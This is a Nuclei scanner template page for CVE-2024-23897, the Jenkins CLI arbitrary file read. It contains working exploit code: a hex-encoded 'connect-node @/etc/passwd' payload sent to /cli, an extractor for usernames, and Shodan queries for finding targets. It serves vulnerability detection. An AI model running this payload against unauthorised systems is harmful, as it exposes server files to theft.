Skip to content
Nuclei Templates

Jenkins < 2.441 - Arbitrary File Read

ID: CVE-2024-23897

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,lfi,rce,jenkins,js,kev

Description

Section titled “Description”

Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an ’@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.

YAML Source

Section titled “YAML Source”
id: CVE-2024-23897


info:
  name: Jenkins < 2.441 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
  reference:
    - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
    - https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
    - https://github.com/Mr-xn/Penetration_Testing_POC
    - https://github.com/forsaken0127/CVE-2024-23897
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-23897
    epss-score: 0.41536
    epss-percentile: 0.97188
    cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: jenkins
    product: jenkins
    shodan-query:
      - "product:\"Jenkins\""
      - cpe:"cpe:2.3:a:jenkins:jenkins"
      - http.favicon.hash:81586312
      - product:"jenkins"
    fofa-query: icon_hash=81586312
  tags: cve,cve2024,lfi,rce,jenkins,js,kev
variables:
  payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"


javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/net');
      let address = Host+":"+Port;
      let conn,conn2;
      try { conn = m.OpenTLS('tcp', address) } catch { conn=  m.Open('tcp', address)}
      conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
      try { conn2 = m.OpenTLS('tcp', address) } catch { conn2=  m.Open('tcp', address)}
      conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
      resp = conn.RecvString(1000)
    args:
      Body: "{{payload}}"
      Host: "{{Host}}"
      Port: 80,443 # if port not specified, defaults to both 80 and 443
      exclude-ports: "0" # override default skip list of 80,443,8080,8443


    matchers:
      - type: dsl
        dsl:
          - 'contains(response, "No such agent \"")'


    extractors:
      - type: regex
        group: 1
        regex:
          - '\b([a-z_][a-z0-9_-]{0,31})\:x\:'
# digest: 4a0a00473045022100958ffd573ce1fb005270fa1bdf8c0c48e0b171b774b8a9202823aeac4a5bcdaa022019cada51c2f59b73570d8c32da5c4d4a8b851b7f948c4eeade800e6b44134974:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "javascript/cves/2024/CVE-2024-23897.yaml"

View on Github